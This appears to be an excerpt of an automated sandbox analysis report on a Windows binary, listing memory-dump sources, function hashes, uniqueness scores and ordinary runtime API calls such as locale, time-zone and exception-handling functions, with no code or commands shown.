                                                                  Similarity
                                                                  • API ID: Resource$LoadLockSizeof
                                                                  • String ID:
                                                                  • API String ID: 2853612939-0
                                                                  • Opcode ID: 33fdcd0c17629a3a6bb51b6c37bb3d5c1a828ac094ad8ea60276c0181a0fe11e
                                                                  • Instruction ID: 1f08b875ae7e0f77d86511838519968f2ad6e82db2632fb9a70362db51223429
                                                                  • Opcode Fuzzy Hash: 33fdcd0c17629a3a6bb51b6c37bb3d5c1a828ac094ad8ea60276c0181a0fe11e
                                                                  • Instruction Fuzzy Hash: 2C11A732A046649BC7368F59ED45B66B7E8E786B15F0005AEEC1DD3690EF799C00C690
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                   • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                  • Instruction ID: 77ec6beb38a656342f9c4533b01f62eabc9b3fc070f5d775ab208310669303a8
                                                                  • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                  • Instruction Fuzzy Hash: 74F13071E012199FDF14CFA8D9806ADB7F1FF98324F1582A9E825A7381D730AE05DB94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00B57F64,00000000,00000000,00000000), ref: 00B57E23
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                   • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: InformationTimeZone
                                                                  • String ID:
                                                                  • API String ID: 565725191-0
                                                                  • Opcode ID: 16fb0c920ceabaf48fe9a4549fc799f4e78b8748d54ba036da8bd47680065f15
                                                                  • Instruction ID: 3b7d70fbaebe9c0d000bbf597ec36c500e1691f1ea15067dce6c7eb4cbf2e712
                                                                  • Opcode Fuzzy Hash: 16fb0c920ceabaf48fe9a4549fc799f4e78b8748d54ba036da8bd47680065f15
                                                                  • Instruction Fuzzy Hash: B1C1F372A44215ABDB20AB64AC02BBE7BF9EF04751F5440E6FD05AB291EF708E45C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B584B8,?,?,00000008,?,?,00B614E4,00000000), ref: 00B586EA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                   • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionRaise
                                                                  • String ID:
                                                                  • API String ID: 3997070919-0
                                                                  • Opcode ID: 276dd20613d482c36fa10ee4a891dd2d592877af1aaba0824fc0f69f6b095c6a
                                                                  • Instruction ID: 255aed580ba6c4b16c3549975f44925624c1bd9a9b19a8674e21910fce2ba33b
                                                                  • Opcode Fuzzy Hash: 276dd20613d482c36fa10ee4a891dd2d592877af1aaba0824fc0f69f6b095c6a
                                                                  • Instruction Fuzzy Hash: 6CB12931210605CFD715CF28C486B657BE0FB49366F2586D8E89ADF2A1CB35ED96CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B435BF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                   • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor
                                                                  • String ID:
                                                                  • API String ID: 2325560087-0
                                                                  • Opcode ID: 67451ce657776dd652e692be3940fd20b605a1ceb5597244a4ece48d8ef88d44
                                                                  • Instruction ID: 0b700070b5b781225d85bdc87539cc019b0124c8f4f3ad7e0e73508ceaab63ad
                                                                  • Opcode Fuzzy Hash: 67451ce657776dd652e692be3940fd20b605a1ceb5597244a4ece48d8ef88d44
                                                                  • Instruction Fuzzy Hash: 4B518BB1A04215CBEB25CF58D881BAABBF0FB04754F18806EC449EB350D774AE80DF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                   • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 25f96ebe93ab791b49f6ff6eab489074789be56cb981823b2d621030916e6f02
                                                                  • Instruction ID: bf34b3533ea32f306adf6c7fedc29d850b1d420888d52d323a1ef07ee27895ce
                                                                  • Opcode Fuzzy Hash: 25f96ebe93ab791b49f6ff6eab489074789be56cb981823b2d621030916e6f02
                                                                  • Instruction Fuzzy Hash: 6D31D772900319AFDB20DFA9CC85EBBB7ADEB84311F1442D9FD15D7240EA30AE448B90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                   • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0
                                                                  • API String ID: 0-4108050209
                                                                  • Opcode ID: 946e30ca64de258661333a4a20cc175995373d6fa3b952e291408ab08c9d16c4
                                                                  • Instruction ID: 27fc5834567c9d9a18f931fae28b923a55b14397988f1d4e022830279f83146e
                                                                  • Opcode Fuzzy Hash: 946e30ca64de258661333a4a20cc175995373d6fa3b952e291408ab08c9d16c4
                                                                  • Instruction Fuzzy Hash: 97C1BF709806468FCB28CF28C590A7EBBF1FF55310F284699D4969B291C731EF46EB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B5E4DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                   • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 3736152602-0
                                                                  • Opcode ID: 477bc9368b7f7f870cfecd57a10df4132ac27e11fddc76c94d575f7916e5e0d2
                                                                  • Instruction ID: a6f0a42eb9579f40326cfb46a4706e21244642cbcf7dc665039dfa512aaa7a43
                                                                  • Opcode Fuzzy Hash: 477bc9368b7f7f870cfecd57a10df4132ac27e11fddc76c94d575f7916e5e0d2
                                                                  • Instruction Fuzzy Hash: 7321A172644206ABDB29AE24EC42B7A73E8EB14316B1000FAFD15D6141FB74EE08D750
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • EnumSystemLocalesW.KERNEL32(00B5E237,00000001,00000000,?,-00000050,?,00B5E868,00000000,?,?,?,00000055,?), ref: 00B5E183
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                   • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2417226690-0
                                                                  • Opcode ID: 88bf93d3225de58944b0f24af95cc37d93a8258daa166350d669bf6e3f1718c4
                                                                  • Instruction ID: 00f3b9daf96ddfe2a7b0402314ea9b62114b3238563676398fd3daa3ada9e49e
                                                                  • Opcode Fuzzy Hash: 88bf93d3225de58944b0f24af95cc37d93a8258daa166350d669bf6e3f1718c4
                                                                  • Instruction Fuzzy Hash: E811293B2007019FDB1C9F39C8916BAB7D2FF8472AB1544ACE95697A40D771BA46CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00B5E453,00000000,00000000,?), ref: 00B5E6E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 3736152602-0
                                                                  • Opcode ID: 202a08fef2a97f11d526219112f2e3eaf645956a04e81bb29393bed666ed2e08
                                                                  • Instruction ID: 4c6e9fe224912c38866b739a73f1ed8aa80ad326e1183aaa60c226da8b9c5502
                                                                  • Opcode Fuzzy Hash: 202a08fef2a97f11d526219112f2e3eaf645956a04e81bb29393bed666ed2e08
                                                                  • Instruction Fuzzy Hash: AFF0A936600212BBDB2C5B648C45BBA77D8EB44755F1504E5EC25A3180EA74FF45C690
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • EnumSystemLocalesW.KERNEL32(00B5E48A,00000001,?,?,-00000050,?,00B5E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00B5E1F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2417226690-0
                                                                  • Opcode ID: b2b6377b4c277a967764adf5c16346246cbee042b8319c3c73eccdc2b7e2b73a
                                                                  • Instruction ID: 4ea9f47d596a0ee2d5a9f5078194967b807df0594bd57a3ceb288f8e5c4280ea
                                                                  • Opcode Fuzzy Hash: b2b6377b4c277a967764adf5c16346246cbee042b8319c3c73eccdc2b7e2b73a
                                                                  • Instruction Fuzzy Hash: FBF046362007045FCB285F358C85B7A7BD5EF80729F0484ECFD158B680C6B1ED02CA50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00B51C9A: EnterCriticalSection.KERNEL32(-00B7DE50,?,00B53576,?,00B7A078,0000000C,00B53841,?), ref: 00B51CA9
                                                                  • EnumSystemLocalesW.KERNEL32(00B57125,00000001,00B7A1D8,0000000C,00B57554,00000000), ref: 00B5716A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                  • String ID:
                                                                  • API String ID: 1272433827-0
                                                                  • Opcode ID: de2cddbf813f5fc4bb07e92a537183922395043ba4a333bbf95ee62a89b5e75d
                                                                  • Instruction ID: 44c620381652a4af1a7e61e85d529ef820f0ee0ac33e84e4f8c04b539c8b2d7d
                                                                  • Opcode Fuzzy Hash: de2cddbf813f5fc4bb07e92a537183922395043ba4a333bbf95ee62a89b5e75d
                                                                  • Instruction Fuzzy Hash: 9DF04972A44204DFE700DFA8E846B9C77F0FB49726F0085DAF814EB2A0DB7599449F80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • EnumSystemLocalesW.KERNEL32(00B5E01F,00000001,?,?,?,00B5E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00B5E0FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2417226690-0
                                                                  • Opcode ID: 4649c46a93505f497fbcedc8b569a93a7bfc4ea932923bfdedaa07b4d3a2785b
                                                                  • Instruction ID: 548b0c173b4c89747a91cb97c763557a3bf1d41d27ec581a9fb27332c6569063
                                                                  • Opcode Fuzzy Hash: 4649c46a93505f497fbcedc8b569a93a7bfc4ea932923bfdedaa07b4d3a2785b
                                                                  • Instruction Fuzzy Hash: 52F0553A30020597CB08AF35CC4676A7FD4EFC1762F0A00D8EE15CB290C6B1D986C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00B400E2,00000000,00000000,00000004,00B3ED14,00000000,00000004,00B3F127,00000000,00000000), ref: 00B42410
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 12fc263d4af4420116ed80d0387e147840a6c111e6867e92ebbc0b7ff33c04a1
                                                                  • Instruction ID: 30821472b4f28e51d95242a862c9402a84bd5701628e575f94626a81bb0a733e
                                                                  • Opcode Fuzzy Hash: 12fc263d4af4420116ed80d0387e147840a6c111e6867e92ebbc0b7ff33c04a1
                                                                  • Instruction Fuzzy Hash: 96E0D832794104B6D7154B7C9E0FFBA76DCD70170AF9041D1FA02E51D1DAA1CB00B161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00B54E3F,?,20001004,00000000,00000002,?,?,00B54441), ref: 00B576E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 3babc3fb6d9dcca82f5815bd703ea2f4de16bf1b77088812fc70c88ac0ed2b35
                                                                  • Instruction ID: 97c5273caabd8559f3ebfd550b3fa5fb60be09be07715036be867fd19b4ee97a
                                                                  • Opcode Fuzzy Hash: 3babc3fb6d9dcca82f5815bd703ea2f4de16bf1b77088812fc70c88ac0ed2b35
                                                                  • Instruction Fuzzy Hash: FBE04F3268861CBBCF122F61EC08FAE3E66EF45752F104091FC0566160CF768920AAD5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00B43077), ref: 00B43544
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 2ca8d73ed3f07329e5fdf45bf787c179e57c68db4d3263d918c8a909ef0f0502
                                                                  • Instruction ID: f3b9caef5f2db2e129a8777379a02e8144a43fb2bb12b6113107b6c7e2603784
                                                                  • Opcode Fuzzy Hash: 2ca8d73ed3f07329e5fdf45bf787c179e57c68db4d3263d918c8a909ef0f0502
                                                                  • Instruction Fuzzy Hash:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00B42C98: EnterCriticalSection.KERNEL32(00B7DD3C,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42CA3
                                                                    • Part of subcall function 00B42C98: LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42CE0
                                                                  • GetProcessHeap.KERNEL32 ref: 00B22365
                                                                    • Part of subcall function 00B42C4E: EnterCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C58
                                                                    • Part of subcall function 00B42C4E: LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C8B
                                                                    • Part of subcall function 00B42C4E: RtlWakeAllConditionVariable.NTDLL ref: 00B42D02
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                  • String ID:
                                                                  • API String ID: 325507722-0
                                                                  • Opcode ID: 9b921c0a7c79e5a34d224184ca8c4c03ff44c1c4bee2d9e1d21e38a2ffdd7073
                                                                  • Instruction ID: 1557506b53dbdb49484438133a7884d790e36a7fc2746ac9c3586255294d316b
                                                                  • Opcode Fuzzy Hash: 9b921c0a7c79e5a34d224184ca8c4c03ff44c1c4bee2d9e1d21e38a2ffdd7073
                                                                  • Instruction Fuzzy Hash: CA2157B1901200DBE710DF68ED4674977F0EB29B24F1082E9E43D9B2E0DB74DA84DB62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                  • Instruction ID: f0fa725a8f16b914c82db5e32ce0437bc8dd7a07d226460db3cc75805d256ec0
                                                                  • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                  • Instruction Fuzzy Hash: F5328974A0021A8FCB28DF98C991BBEB7F5EF45305F2445E8DD41A7345D632AE4ACB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9b8823f9b6138c4c9ff0f391408e05ba7bac66dc44d118335791298c19cbc698
                                                                  • Instruction ID: 5842b30aed35f87e7903dccb5bdec73d7a6a4a3fba6798123bec498bb7e67c3b
                                                                  • Opcode Fuzzy Hash: 9b8823f9b6138c4c9ff0f391408e05ba7bac66dc44d118335791298c19cbc698
                                                                  • Instruction Fuzzy Hash: 1F32F321D29F418DD7235634DC62339A298AFB73C5F15D767E81AB6AAAEF6884C34100
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
